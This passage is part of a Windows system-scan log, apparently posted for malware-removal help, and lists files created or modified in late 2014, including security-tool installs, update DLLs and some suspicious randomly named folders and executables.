____D () C:\ProgramData\Malwarebytes</p><p>2014-11-30 20:00 - 2014-11-30 20:00 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes Anti-Malware</p><p>2014-11-30 20:00 - 2014-10-01 11:11 - 00064216 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys</p><p>2014-11-30 20:00 - 2014-10-01 11:11 - 00025816 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys</p><p>2014-11-30 19:52 - 2014-11-30 19:52 - 00000117 _____ () C:\Windows\system32\netcfg-357703.txt</p><p>2014-11-30 19:47 - 2014-11-30 19:47 - 00000117 _____ () C:\Windows\system32\netcfg-96156.txt</p><p>2014-11-30 19:46 - 2014-12-01 09:28 - 00005748 _____ () 
C:\Windows\PFRO.log</p><p>2014-11-30 19:43 - 2014-11-30 19:43 - 00000167 _____ () C:\Windows\system32\netcfg-116564500.txt</p><p>2014-11-30 19:43 - 2014-11-30 19:43 - 00000117 _____ () C:\Windows\system32\netcfg-116559484.txt</p><p>2014-11-30 19:43 - 2014-11-30 19:43 - 00000117 _____ () C:\Windows\system32\netcfg-116556640.txt</p><p>2014-11-30 19:33 - 2014-11-30 21:40 - 202839360 _____ (Kaspersky Lab) C:\Users\johnsmith\Downloads\kis15.0.1.415EN_6874.exe</p><p>2014-11-30 10:16 - 2014-12-01 06:21 - 00961086 _____ () C:\Windows\WindowsUpdate.log</p><p>2014-11-29 12:11 - 2014-11-29 12:11 - 00000117 _____ () C:\Windows\system32\netcfg-3028671.txt</p><p>2014-11-29 12:11 - 2014-11-29 12:11 - 00000117 _____ () C:\Windows\system32\netcfg-3022500.txt</p><p>2014-11-27 13:22 - 2014-11-27 13:22 - 00000117 _____ () C:\Windows\system32\netcfg-45219796.txt</p><p>2014-11-27 13:22 - 2014-11-27 13:22 - 00000117 _____ () C:\Windows\system32\netcfg-45219750.txt</p><p>2014-11-27 12:51 - 2014-11-27 12:51 - 00000117 _____ () C:\Windows\system32\netcfg-43350140.txt</p><p>2014-11-27 12:51 - 2014-11-27 12:51 - 00000117 _____ () C:\Windows\system32\netcfg-43350078.txt</p><p>2014-11-27 11:59 - 2014-11-27 11:59 - 00000117 _____ () C:\Windows\system32\netcfg-40248046.txt</p><p>2014-11-27 11:59 - 2014-11-27 11:59 - 00000117 _____ () C:\Windows\system32\netcfg-40247437.txt</p><p>2014-11-27 00:48 - 2014-11-27 00:48 - 00000117 _____ () C:\Windows\system32\netcfg-80960203.txt</p><p>2014-11-26 18:07 - 2014-11-27 00:48 - 00000000 ____D () C:\Users\johnsmith\AppData\Roaming\Iravbypa</p><p>2014-11-26 18:03 - 2014-11-30 20:33 - 00000000 ____D () C:\ProgramData\NicwEsray</p><p>2014-11-26 02:23 - 2014-11-26 02:23 - 00000117 _____ () C:\Windows\system32\netcfg-276359.txt</p><p>2014-11-26 02:18 - 2014-11-26 02:18 - 00000117 _____ () C:\Windows\system32\netcfg-57643953.txt</p><p>2014-11-26 00:23 - 2014-11-26 00:23 - 00000117 _____ () C:\Windows\system32\netcfg-50768500.txt</p><p>2014-11-26 00:23 - 2014-11-26 
00:23 - 00000117 _____ () C:\Windows\system32\netcfg-50768421.txt</p><p>2014-11-25 18:46 - 2014-11-26 02:18 - 00000000 ____D () C:\Users\johnsmith\AppData\Roaming\FrameworkUpdate</p><p>2014-11-25 16:44 - 2014-11-25 16:44 - 00000117 _____ () C:\Windows\system32\netcfg-23231437.txt</p><p>2014-11-25 16:44 - 2014-11-25 16:44 - 00000117 _____ () C:\Windows\system32\netcfg-23231328.txt</p><p>2014-11-25 15:56 - 2014-11-25 15:56 - 00001475 _____ () C:\Users\johnsmith\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Google.lnk</p><p>2014-11-25 10:54 - 2014-11-25 10:54 - 00000117 _____ () C:\Windows\system32\netcfg-2195375.txt</p><p>2014-11-25 10:19 - 2014-11-25 10:19 - 00000117 _____ () C:\Windows\system32\netcfg-125890.txt</p><p>2014-11-23 17:33 - 2014-11-23 17:33 - 00000117 _____ () C:\Windows\system32\netcfg-109928343.txt</p><p>2014-11-23 17:33 - 2014-11-23 17:33 - 00000117 _____ () C:\Windows\system32\netcfg-109928281.txt</p><p>2014-11-23 17:32 - 2014-11-23 17:32 - 00000117 _____ () C:\Windows\system32\netcfg-109871812.txt</p><p>2014-11-23 17:32 - 2014-11-23 17:32 - 00000117 _____ () C:\Windows\system32\netcfg-109871734.txt</p><p>2014-11-23 15:32 - 2014-11-23 15:32 - 00000117 _____ () C:\Windows\system32\netcfg-102657734.txt</p><p>2014-11-23 15:32 - 2014-11-23 15:32 - 00000117 _____ () C:\Windows\system32\netcfg-102657562.txt</p><p>2014-11-22 17:17 - 2014-11-22 17:17 - 00000117 _____ () C:\Windows\system32\netcfg-22575437.txt</p><p>2014-11-22 11:03 - 2014-11-22 11:03 - 00000117 _____ () C:\Windows\system32\netcfg-137015.txt</p><p>2014-11-20 09:44 - 2014-11-20 09:44 - 00000117 _____ () C:\Windows\system32\netcfg-53047234.txt</p><p>2014-11-20 07:40 - 2014-11-20 07:40 - 00000117 _____ () C:\Windows\system32\netcfg-45565703.txt</p><p>2014-11-20 01:14 - 2014-11-08 04:22 - 00238080 _____ (Microsoft Corporation) C:\Windows\system32\pku2u.dll</p><p>2014-11-20 01:14 - 2014-11-08 04:21 - 00827904 _____ (Microsoft Corporation) C:\Windows\system32\kerberos.dll</p><p>2014-11-20 
01:14 - 2014-11-07 23:57 - 00187904 _____ (Microsoft Corporation) C:\Windows\SysWOW64\pku2u.dll</p><p>2014-11-20 01:14 - 2014-11-07 23:56 - 00666624 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kerberos.dll</p><p>2014-11-20 01:14 - 2014-10-11 01:35 - 00171840 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecpkg.sys</p><p>2014-11-20 01:14 - 2014-10-11 00:44 - 00588288 _____ (Microsoft Corporation) C:\Windows\system32\SHCore.dll</p><p>2014-11-20 01:14 - 2014-10-11 00:43 - 01281536 _____ (Microsoft Corporation) C:\Windows\system32\lsasrv.dll</p><p>2014-11-20 01:14 - 2014-10-10 22:57 - 00452608 _____ (Microsoft Corporation) C:\Windows\SysWOW64\SHCore.dll</p><p>2014-11-20 01:14 - 2014-05-29 16:02 - 00439808 _____ (Microsoft Corporation) C:\Windows\system32\lsm.dll</p><p>2014-11-20 01:14 - 2014-04-12 02:10 - 00578048 _____ (Microsoft Corporation) C:\Windows\system32\winlogon.exe</p><p>2014-11-20 01:14 - 2014-04-12 02:09 - 01043968 _____ (Microsoft Corporation) C:\Windows\system32\usercpl.dll</p><p>2014-11-20 01:14 - 2014-04-12 02:09 - 00208896 _____ (Microsoft Corporation) C:\Windows\system32\wdigest.dll</p><p>2014-11-20 01:14 - 2014-04-12 02:09 - 00094720 _____ (Microsoft Corporation) C:\Windows\system32\TSpkg.dll</p><p>2014-11-20 01:14 - 2014-04-12 02:08 - 00318464 _____ (Microsoft Corporation) C:\Windows\system32\msv1_0.dll</p><p>2014-11-20 01:14 - 2014-04-12 02:07 - 00020480 _____ (Microsoft Corporation) C:\Windows\system32\credssp.dll</p><p>2014-11-20 01:14 - 2014-04-12 00:23 - 00961536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\usercpl.dll</p><p>2014-11-20 01:14 - 2014-04-12 00:23 - 00273920 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msv1_0.dll</p><p>2014-11-20 01:14 - 2014-04-12 00:23 - 00178688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wdigest.dll</p><p>2014-11-20 01:14 - 2014-04-12 00:23 - 00076800 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TSpkg.dll</p><p>2014-11-20 01:14 - 2014-04-12 00:22 - 00017408 _____ 
(Microsoft Corporation) C:\Windows\SysWOW64\credssp.dll</p><p>2014-11-20 01:14 - 2014-04-11 23:58 - 00014848 _____ (Microsoft Corporation) C:\Windows\system32\workerdd.dll</p><p>2014-11-20 01:14 - 2014-03-03 16:07 - 00570216 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\cng.sys</p><p>2014-11-19 20:57 - 2014-11-19 20:57 - 00000117 _____ () C:\Windows\system32\netcfg-7000390.txt</p><p>2014-11-19 20:52 - 2014-11-19 20:52 - 00000117 _____ () C:\Windows\system32\netcfg-6735375.txt</p><p>2014-11-19 19:26 - 2014-11-19 19:26 - 00034808 _____ () C:\Windows\system32\Drivers\TrueSight.sys</p><p>2014-11-19 19:26 - 2014-11-19 19:26 - 00000000 ____D () C:\ProgramData\RogueKiller</p><p>2014-11-19 13:25 - 2014-11-19 13:25 - 00000117 _____ () C:\Windows\system32\netcfg-14821203.txt</p><p>2014-11-19 13:25 - 2014-11-19 13:25 - 00000117 _____ () C:\Windows\system32\netcfg-14820968.txt</p><p>2014-11-18 07:57 - 2014-11-18 07:57 - 00000117 _____ () C:\Windows\system32\netcfg-57518609.txt</p><p>2014-11-18 07:56 - 2014-11-18 07:56 - 00000117 _____ () C:\Windows\system32\netcfg-57439656.txt</p><p>2014-11-14 19:39 - 2014-11-17 15:26 - 00000000 ____D () C:\Users\johnsmith\Downloads\walking-dead-S03</p><p>2014-11-14 19:36 - 2014-11-17 15:26 - 00000000 ____D () C:\Users\johnsmith\Downloads\walking-dead-S01</p><p>2014-11-14 19:34 - 2014-11-17 10:35 - 00000000 ____D () C:\Users\johnsmith\Downloads\walking-dead-S02</p><p>2014-11-14 16:06 - 2014-11-14 16:06 - 00000325 _____ () C:\Users\johnsmith\Desktop\Employee Calendar.url</p><p>2014-11-14 13:07 - 2014-11-14 13:07 - 00000117 _____ () C:\Windows\system32\netcfg-696923281.txt</p><p>2014-11-13 09:01 - 2014-11-13 09:01 - 00000117 _____ () C:\Windows\system32\netcfg-595764046.txt</p><p>2014-11-13 09:01 - 2014-11-13 09:01 - 00000117 _____ () C:\Windows\system32\netcfg-595763968.txt</p><p>2014-11-12 09:04 - 2014-11-12 09:04 - 00000117 _____ () C:\Windows\system32\netcfg-509518703.txt</p><p>2014-11-12 09:04 - 2014-11-12 09:04 - 00000117 _____ 
() C:\Windows\system32\netcfg-509518593.txt</p><p>2014-11-12 09:04 - 2014-11-12 09:04 - 00000117 _____ () C:\Windows\system32\netcfg-509512187.txt</p><p>2014-11-12 09:00 - 2014-11-12 09:00 - 00000117 _____ () C:\Windows\system32\netcfg-509313421.txt</p><p>2014-11-12 08:56 - 2014-11-12 08:56 - 00000117 _____ () C:\Windows\system32\netcfg-509068250.txt</p><p>2014-11-12 08:56 - 2014-11-12 08:56 - 00000117 _____ () C:\Windows\system32\netcfg-509062265.txt</p><p>2014-11-12 02:48 - 2014-09-24 16:29 - 00318976 _____ (Microsoft Corporation) C:\Windows\SysWOW64\schannel.dll</p><p>2014-11-12 02:48 - 2014-09-24 16:29 - 00072192 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ncryptsslp.dll</p><p>2014-11-12 02:48 - 2014-09-24 16:01 - 00414208 _____ (Microsoft Corporation) C:\Windows\system32\schannel.dll</p><p>2014-11-12 02:48 - 2014-09-24 16:01 - 00086528 _____ (Microsoft Corporation) C:\Windows\system32\ncryptsslp.dll</p><p>2014-11-12 02:48 - 2014-08-21 16:56 - 01418752 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msxml3.dll</p><p>2014-11-12 02:48 - 2014-08-21 16:27 - 01845760 _____ (Microsoft Corporation) C:\Windows\system32\msxml3.dll</p><p>2014-11-12 02:48 - 2014-08-09 01:30 - 00148480 _____ (Microsoft Corporation) C:\Windows\system32\poqexec.exe</p><p>2014-11-12 02:48 - 2014-08-09 01:29 - 00144896 _____ (Microsoft Corporation) C:\Windows\system32\tssdisai.dll</p><p>2014-11-12 02:47 - 2014-10-23 05:47 - 00079872 _____ (Microsoft Corporation) C:\Windows\system32\packager.dll</p><p>2014-11-12 02:47 - 2014-10-23 04:04 - 00068096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\packager.dll</p><p>2014-11-12 02:47 - 2014-10-18 01:44 - 00778240 _____ (Microsoft Corporation) C:\Windows\system32\oleaut32.dll</p><p>2014-11-12 02:47 - 2014-10-18 00:05 - 00567808 _____ (Microsoft Corporation) C:\Windows\SysWOW64\oleaut32.dll</p><p>2014-11-12 02:47 - 2014-10-11 00:44 - 03248640 _____ (Microsoft Corporation) C:\Windows\system32\rdpcorets.dll</p><p>2014-11-12 02:47 - 2014-10-10 
22:41 - 00713728 _____ (Microsoft Corporation) C:\Windows\system32\adtschema.dll</p><p>2014-11-12 02:47 - 2014-10-10 22:41 - 00146944 _____ (Microsoft Corporation) C:\Windows\system32\msaudite.dll</p><p>2014-11-12 02:47 - 2014-10-10 22:05 - 00146944 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msaudite.dll</p><p>2014-11-12 02:47 - 2014-10-10 22:04 - 00713728 _____ (Microsoft Corporation) C:\Windows\SysWOW64\adtschema.dll</p><p>2014-11-12 02:47 - 2014-10-02 18:21 - 00522728 _____ (Microsoft Corporation) C:\Windows\system32\AUDIOKSE.dll</p><p>2014-11-12 02:47 - 2014-10-02 15:29 - 00783872 _____ (Microsoft Corporation) C:\Windows\system32\audiosrv.dll</p><p>2014-11-12 02:47 - 2014-10-02 15:29 - 00267264 _____ (Microsoft Corporation) C:\Windows\system32\EncDump.dll</p><p>2014-11-12 02:47 - 2014-10-02 15:29 - 00169472 _____ (Microsoft Corporation) C:\Windows\system32\AudioEndpointBuilder.dll</p><p>2014-11-12 02:47 - 2014-10-01 16:05 - 04068864 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys</p><p>2014-11-12 02:47 - 2014-09-12 23:24 - 02233152 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\tcpip.sys</p><p>2014-11-12 02:47 - 2014-05-02 20:34 - 00235520 _____ (Microsoft Corporation) C:\Windows\system32\rdpudd.dll</p><p>2014-11-12 02:47 - 2012-10-12 01:08 - 00027880 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\rdpvideominiport.sys</p><p>2014-11-12 02:47 - 2012-10-11 23:14 - 00036352 _____ (Microsoft Corporation) C:\Windows\system32\rfxvmt.dll</p><p>2014-11-12 02:46 - 2014-10-25 18:56 - 02237952 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll</p><p>2014-11-12 02:46 - 2014-10-25 18:56 - 01409536 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll</p><p>2014-11-12 02:46 - 2014-10-25 18:56 - 00915968 _____ (Microsoft Corporation) C:\Windows\system32\uxtheme.dll</p><p>2014-11-12 02:46 - 2014-10-25 18:56 - 00053760 _____ (Microsoft Corporation) C:\Windows\system32\UXInit.dll</p><p>2014-11-12 02:46 - 2014-10-25 18:56 
- 00051712 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe</p><p>2014-11-12 02:46 - 2014-10-25 18:55 - 19284480 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll</p><p>2014-11-12 02:46 - 2014-10-25 18:55 - 00603136 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll</p><p>2014-11-12 02:46 - 2014-10-25 18:55 - 00097280 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll</p><p>2014-11-12 02:46 - 2014-10-25 18:54 - 15399424 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll</p><p>2014-11-12 02:46 - 2014-10-25 18:54 - 02655232 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll</p><p>2014-11-12 02:46 - 2014-10-25 18:54 - 00855552 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll</p><p>2014-11-12 02:46 - 2014-10-25 18:54 - 00451584 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll</p><p>2014-11-12 02:46 - 2014-10-25 18:54 - 00281600 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll</p><p>2014-11-12 02:46 - 2014-10-25 18:54 - 00255488 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll</p><p>2014-11-12 02:46 - 2014-10-25 18:54 - 00136704 _____ (Microsoft Corporation) C:\Windows\system32\iesysprep.dll</p><p>2014-11-12 02:46 - 2014-10-25 18:53 - 01509376 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl</p><p>2014-11-12 02:46 - 2014-10-25 17:36 - 01762816 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll</p><p>2014-11-12 02:46 - 2014-10-25 17:35 - 01181696 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll</p><p>2014-11-12 02:46 - 2014-10-25 17:35 - 00493056 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll</p><p>2014-11-12 02:46 - 2014-10-25 17:35 - 00044032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\UXInit.dll</p><p>2014-11-12 02:46 - 2014-10-25 17:34 - 13758464 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll</p><p>2014-11-12 02:46 - 2014-10-25 17:34 - 02055168 _____ (Microsoft Corporation) 
C:\Windows\SysWOW64\iertutil.dll</p><p>2014-11-12 02:46 - 2014-10-25 17:34 - 01441280 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl</p><p>2014-11-12 02:46 - 2014-10-25 17:34 - 00357888 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtmsft.dll</p><p>2014-11-12 02:46 - 2014-10-25 17:34 - 00226816 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iedkcs32.dll</p><p>2014-11-12 02:46 - 2014-10-25 17:34 - 00226816 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtrans.dll</p><p>2014-11-12 02:46 - 2014-10-25 17:34 - 00109056 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iesysprep.dll</p><p>2014-11-12 02:46 - 2014-10-25 17:34 - 00033280 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iernonce.dll</p><p>2014-11-12 02:46 - 2014-10-25 17:19 - 02706432 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb</p><p>2014-11-12 02:46 - 2014-10-25 17:13 - 02706432 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.tlb</p><p>2014-11-12 02:46 - 2014-10-25 14:48 - 00534528 _____ (Microsoft Corporation) C:\Windows\SysWOW64\uxtheme.dll</p><p>2014-11-12 02:46 - 2014-09-21 22:53 - 00035320 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\WdBoot.sys</p><p>2014-11-12 02:46 - 2014-09-05 17:46 - 00389176 _____ () C:\Windows\system32\ApnDatabase.xml</p><p>2014-11-12 02:46 - 2014-09-02 19:48 - 00141824 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rpchttp.dll</p><p>2014-11-12 02:46 - 2014-09-02 19:22 - 00188928 _____ (Microsoft Corporation) C:\Windows\system32\rpchttp.dll</p><p>2014-11-12 02:46 - 2014-08-28 21:17 - 02043392 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WsmSvc.dll</p><p>2014-11-12 02:46 - 2014-08-28 21:17 - 00227328 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WsmWmiPl.dll</p><p>2014-11-12 02:46 - 2014-08-28 21:04 - 02837504 _____ (Microsoft Corporation) C:\Windows\system32\WsmSvc.dll</p><p>2014-11-12 02:46 - 2014-08-28 21:04 - 00309248 _____ (Microsoft Corporation) C:\Windows\system32\WsmWmiPl.dll</p><p>2014-11-12 
02:46 - 2014-08-27 23:04 - 00499712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\FXSCOMEX.dll</p><p>2014-11-12 02:46 - 2014-08-27 23:04 - 00227840 _____ (Microsoft Corporation) C:\Windows\SysWOW64\FXSAPI.dll</p><p>2014-11-12 02:46 - 2014-08-27 22:59 - 00616448 _____ (Microsoft Corporation) C:\Windows\system32\FXSAPI.dll</p><p>2014-11-12 02:46 - 2014-08-27 22:59 - 00609280 _____ (Microsoft Corporation) C:\Windows\system32\FXSCOMEX.dll</p><p>2014-11-12 02:46 - 2014-08-27 22:59 - 00432640 _____ (Microsoft Corporation) C:\Windows\system32\FXSTIFF.dll</p><p>2014-11-12 02:46 - 2014-08-27 22:59 - 00254976 _____ (Microsoft Corporation) C:\Windows\system32\FXST30.dll</p><p>2014-11-12 02:46 - 2014-08-26 15:08 - 00270024 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\WdFilter.sys</p><p>2014-11-12 02:46 - 2014-07-24 06:12 - 00328512 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\Classpnp.sys</p><p>2014-11-12 02:45 - 2014-10-25 18:55 - 00197120 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll</p><p>2014-11-12 02:45 - 2014-10-25 18:54 - 03959296 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll</p><p>2014-11-12 02:45 - 2014-10-25 18:54 - 00067072 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll</p><p>2014-11-12 02:45 - 2014-10-25 18:54 - 00053760 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll</p><p>2014-11-12 02:45 - 2014-10-25 18:54 - 00039936 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll</p><p>2014-11-12 02:45 - 2014-10-25 17:35 - 14368768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll</p><p>2014-11-12 02:45 - 2014-10-25 17:35 - 00163840 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msrating.dll</p><p>2014-11-12 02:45 - 2014-10-25 17:35 - 00080384 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmled.dll</p><p>2014-11-12 02:45 - 2014-10-25 17:34 - 02861568 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll</p><p>2014-11-12 02:45 - 2014-10-25 
17:34 - 00690688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript.dll</p><p>2014-11-12 02:45 - 2014-10-25 17:34 - 00061440 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iesetup.dll</p><p>2014-11-12 02:45 - 2014-10-25 17:34 - 00039936 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jsproxy.dll</p><p>2014-11-10 11:28 - 2014-11-10 11:28 - 00000117 _____ () C:\Windows\system32\netcfg-345340312.txt</p><p>2014-11-10 11:28 - 2014-11-10 11:28 - 00000117 _____ () C:\Windows\system32\netcfg-345340234.txt</p><p>2014-11-10 08:04 - 2014-11-10 08:04 - 00000117 _____ () C:\Windows\system32\netcfg-333130109.txt</p><p>2014-11-10 08:04 - 2014-11-10 08:04 - 00000117 _____ () C:\Windows\system32\netcfg-333127046.txt</p><p>2014-11-08 23:43 - 2014-11-08 23:43 - 00000117 _____ () C:\Windows\system32\netcfg-216665062.txt</p><p>2014-11-08 23:43 - 2014-11-08 23:43 - 00000117 _____ () C:\Windows\system32\netcfg-216664734.txt</p><p>2014-11-08 20:51 - 2014-11-08 20:51 - 00000117 _____ () C:\Windows\system32\netcfg-206372718.txt</p><p>2014-11-08 20:51 - 2014-11-08 20:51 - 00000117 _____ () C:\Windows\system32\netcfg-206371781.txt</p><p>2014-11-08 18:54 - 2014-11-09 23:10 - 00000000 ____D () C:\Users\johnsmith\Downloads\bosch.s01e01.pilot.720p.webrip.x264-w4f-sample.mkv</p><p>2014-11-07 09:27 - 2014-11-07 09:27 - 00000117 _____ () C:\Windows\system32\netcfg-78900203.txt</p><p>2014-11-07 09:27 - 2014-11-07 09:27 - 00000117 _____ () C:\Windows\system32\netcfg-78898078.txt</p><p>2014-11-07 01:42 - 2014-11-14 11:23 - 00000000 ____D () C:\Users\johnsmith\Downloads\polyphonic spree (1)</p><p>2014-11-07 01:34 - 2014-11-07 01:37 - 00000000 ____D () C:\Users\johnsmith\Downloads\polyphonic spree</p><p>2014-11-06 11:31 - 2014-11-06 11:31 - 00002560 _____ () C:\Users\johnsmith\AppData\Local\6A815FEA01B.exe</p><p>2014-11-06 11:26 - 2014-11-06 11:26 - 00002560 _____ () C:\Users\johnsmith\AppData\Local\EB79B990EB2A.exe</p><p></p><p>==================== One Month Modified Files and Folders 
=======</p><p></p><p>(If an entry is included in the fixlist, the file\folder will be moved.)</p><p></p><p>2014-12-01 09:38 - 2012-07-25 22:26 - 00262144 ___SH () C:\Windows\system32\config\ELAM</p><p>2014-12-01 09:36 - 2012-07-26 01:12 - 00000000 ___HD () C:\Windows\ELAMBKUP</p><p>2014-12-01 09:35 - 2014-05-08 13:10 - 00000928 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job</p><p>2014-12-01 09:35 - 2012-07-26 00:28 - 00941114 _____ () C:\Windows\system32\PerfStringBackup.INI</p><p>2014-12-01 09:31 - 2014-05-08 13:10 - 00000924 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job</p><p>2014-12-01 09:29 - 2012-07-26 00:22 - 00000006 ____H () C:\Windows\Tasks\SA.DAT</p><p>2014-12-01 09:26 - 2012-07-25 22:37 - 00000000 ____D () C:\Windows\servicing</p><p>2014-12-01 09:20 - 2012-07-26 01:12 - 00000000 ____D () C:\Windows\WinStore</p><p>2014-12-01 09:19 - 2012-07-26 01:12 - 00000000 ___RD () C:\Windows\ToastData</p><p>2014-12-01 09:19 - 2012-07-26 01:12 - 00000000 ___RD () C:\Windows\ImmersiveControlPanel</p><p>2014-12-01 09:19 - 2012-07-26 01:12 - 00000000 ____D () C:\Windows\PolicyDefinitions</p><p>2014-12-01 09:19 - 2012-07-25 22:38 - 00000000 ____D () C:\Windows\system32\oobe</p><p>2014-12-01 09:18 - 2012-07-26 01:12 - 00000000 ___RD () C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility</p><p>2014-12-01 09:18 - 2012-07-26 01:12 - 00000000 ___RD () C:\Users\Default User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility</p><p>2014-12-01 09:17 - 2012-07-26 01:12 - 00000000 ___RD () C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools</p><p>2014-12-01 09:17 - 2012-07-26 01:12 - 00000000 ___RD () C:\Users\Default User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools</p><p>2014-12-01 09:17 - 2012-07-26 01:12 - 00000000 ___RD () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories</p><p>2014-12-01 09:17 - 2012-07-26 01:12 - 00000000 ____D () 
C:\Program Files\Windows Defender</p><p>2014-12-01 09:17 - 2012-07-26 01:12 - 00000000 ____D () C:\Program Files (x86)\Windows Defender</p><p>2014-12-01 09:17 - 2012-07-26 00:52 - 00000000 ____D () C:\Program Files\Windows Journal</p><p>2014-12-01 09:14 - 2012-07-26 01:12 - 00000000 ____D () C:\Program Files\Windows Photo Viewer</p><p>2014-12-01 09:14 - 2012-07-26 01:12 - 00000000 ____D () C:\Program Files (x86)\Windows Photo Viewer</p><p>2014-12-01 09:14 - 2012-07-25 22:38 - 00000000 ____D () C:\Windows\SysWOW64\Dism</p><p>2014-12-01 09:14 - 2012-07-25 22:38 - 00000000 ____D () C:\Windows\system32\Dism</p><p>2014-12-01 09:00 - 2012-07-26 01:12 - 00000000 ____D () C:\Windows\system32\sru</p><p>2014-12-01 08:57 - 2012-07-26 00:59 - 00000000 ____D () C:\Windows\CbsTemp</p><p>2014-12-01 08:56 - 2013-01-24 23:13 - 00003598 _____ () C:\Windows\System32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-2762839642-1568754923-376086736-1001</p><p>2014-12-01 08:25 - 2013-01-25 10:20 - 00000000 ____D () C:\Users\johnsmith\AppData\Roaming\vlc</p><p>2014-12-01 07:52 - 2012-07-26 01:12 - 00000000 ____D () C:\Windows\system32\NDF</p><p>2014-12-01 07:51 - 2012-11-21 00:19 - 00002739 _____ () C:\Windows\system32\RaCoInst.log</p><p>2014-12-01 07:28 - 2013-01-25 00:49 - 00000000 ____D () C:\Users\johnsmith\Desktop\giganews</p><p>2014-12-01 07:19 - 2013-01-31 21:49 - 00000000 ____D () C:\Users\johnsmith\AppData\Local\CrashDumps</p><p>2014-11-30 20:33 - 2012-09-12 18:50 - 00000000 ____D () C:\Windows\en</p><p>2014-11-30 19:46 - 2012-07-25 22:26 - 00008192 ___SH () C:\Windows\system32\config\BBI</p><p>2014-11-30 19:35 - 2014-04-29 05:42 - 00000000 ____D () C:\Users\johnsmith\AppData\Roaming\Binreader</p><p>2014-11-30 18:43 - 2014-09-24 20:10 - 00000000 ____D () C:\Users\johnsmith\Desktop\House Ideas</p><p>2014-11-29 09:58 - 2014-08-29 23:18 - 00000000 ____D () C:\Users\johnsmith\AppData\Roaming\tixati</p><p>2014-11-25 16:39 - 2014-05-08 13:10 - 00002183 _____ () 
